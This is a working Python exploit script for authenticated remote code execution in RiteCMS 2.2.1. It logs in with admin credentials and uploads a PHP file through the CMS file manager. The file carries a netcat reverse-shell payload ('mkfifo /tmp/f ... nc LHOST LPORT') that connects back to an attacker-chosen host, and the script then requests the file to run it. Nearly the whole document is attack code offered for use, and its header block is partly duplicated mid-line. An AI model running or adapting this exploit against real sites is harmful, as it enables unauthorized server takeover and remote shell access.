Rite CMS 2.2.1 Remote Code Execution

# Exploit Title: RiteCMS 2.2.1 - Authenticated Remote Code Execution
# Date: 2020-07-03
# Exploit Author: H0j3n
# Vendor Homepage: http://ritecms.com/
# Software Link: http://sourc # Exploit Title: RiteCMS 2.2.1 - Authenticated Remote Code Execution
# Date: 2020-07-03
# Exploit Author: H0j3n
# Vendor Homepage: http://ritecms.com/
# Software Link: http://sourceforge.net/projects/ritecms/files/ritecms_2.2.1.zip/download
# Version: 2.2.1
# Tested on: Linux
# Reference: https://www.exploit-db.com/exploits/48636

# !/usr/bin/python
# coding=utf-8
import requests,sys,base64,os
from colorama import Fore, Back, Style
from requests_toolbelt.multipart.encoder import MultipartEncoder
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

# Variable
CONTENT = '''<form action="index.php" method="post">'''

# Header
def header():
top = cyan('''
_____ _ _ _____ __ __ _____
| __ (_) | / ____| / |/ ____|
| |__) |_| |_ ___| | | / | (___ ___ ___ ___
| _ /| | __/ _ | | |/| |\___ _ __ |_ | |_ | < /
| | | | || __/ |____| | | |____) | | |/ / / __/_ / __/_ / /
|_| \_\_|\__\___|\_____|_| |_|_____/ |___/ /____(_)____(_)_/
''')
return top

def info():
top = cyan('''
[+] IP : {0}
[+] USERNAME : {1}
[+] PASSWORD : {2}
'''.format(IP,USER,PASS))

return top

# Request Function
# Color Function
def cyan(STRING):
return Style.BRIGHT+Fore.CYAN+STRING+Fore.RESET

def red(STRING):
return Style.BRIGHT+Fore.RED+STRING+Fore.RESET


# Main
if __name__ == "__main__":
print header()
print " --------------------------------------------------------------"
print " | RiteCMS v2.2.1 - Authenticated Remote Code Execution |"
print " --------------------------------------------------------------"
print " | Reference : https://www.exploit-db.com/exploits/48636 |"
print " | By : H0j3n |"
print " --------------------------------------------------------------"
if len(sys.argv) == 1:
print red("[+] Usage : python %s http://10.10.10.10 admin:admin" % sys.argv[0])

print cyan(" [-] Please Put IP & Credentials")
sys.exit(-1)
if len(sys.argv) == 2:
print red("[+] Usage : python %s http://10.10.10.10 admin:admin" % sys.argv[0])

print cyan(" [-] Please Put Credentials")
sys.exit(-1)
if len(sys.argv) > 3:
print red("[+] Usage : python %s http://10.10.10.10 admin:admin" % sys.argv[0])

print cyan(" [-] Only 2 arguments needed please see the usage!")
sys.exit(-1)
IP = sys.argv[1]
USER,PASS = sys.argv[2].split(":")
print info()

URL='{0}/cms/index.php'.format(IP)
URL_UPLOAD = URL + '?mode=filemanager&action=upload&directory=media'

HEAD = {"User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"}
LOG_INFO = {"username" : USER, "userpw" : PASS}
try:
with requests.Session() as SESSION:
SESSION.get(URL)
SESSION.post(URL, data=LOG_INFO, headers=HEAD,allow_redirects=False)
except:
print red("[-] Check the URL!")
sys.exit(-1)
if CONTENT in str(SESSION.get(URL_UPLOAD).text):
print red("[-] Cannot Login!")
sys.exit(-1)
else:
print cyan("[+] Credentials Working!")
LHOST = str(raw_input("Enter LHOST : "))
LPORT = str(raw_input("Enter LPORT : "))
FILENAME = str(raw_input("Enter FileName (include.php) : "))
PAYLOAD = "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f'); ?>".format(LHOST,LPORT)
FORM_DATA = {
'mode': (None,'filemanager'),
'file': (FILENAME, PAYLOAD),
'directory': (None, 'media'),
'file_name': (None, ''),
'upload_mode': (None, '1'),
'resize_xy': (None, 'x'),
'resize': (None, '640'),
'compression': (None, '80'),
'thumbnail_resize_xy': (None, 'x'),
'thumbnail_resize': (None, '150'),
'thumbnail_compression': (None, '70'),
'upload_file_submit': (None, 'OK - Upload file')
}
HEADER_UPLOAD = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': URL_UPLOAD
}
response = SESSION.post(URL,files=FORM_DATA,headers=HEADER_UPLOAD)
if FILENAME in response.text:
print cyan(" [+] File uploaded and can be found!")
else:
print red("[-] File cannot be found or use different file name!")
sys.exit(-1)
URL_GET = IP + '/media/{0}'.format(FILENAME)
OPTIONS = str(raw_input("Exploit Now (y/n)?"))
print cyan(" W0rk1ng!!! Enjoy :)")
SESSION.get(URL_GET)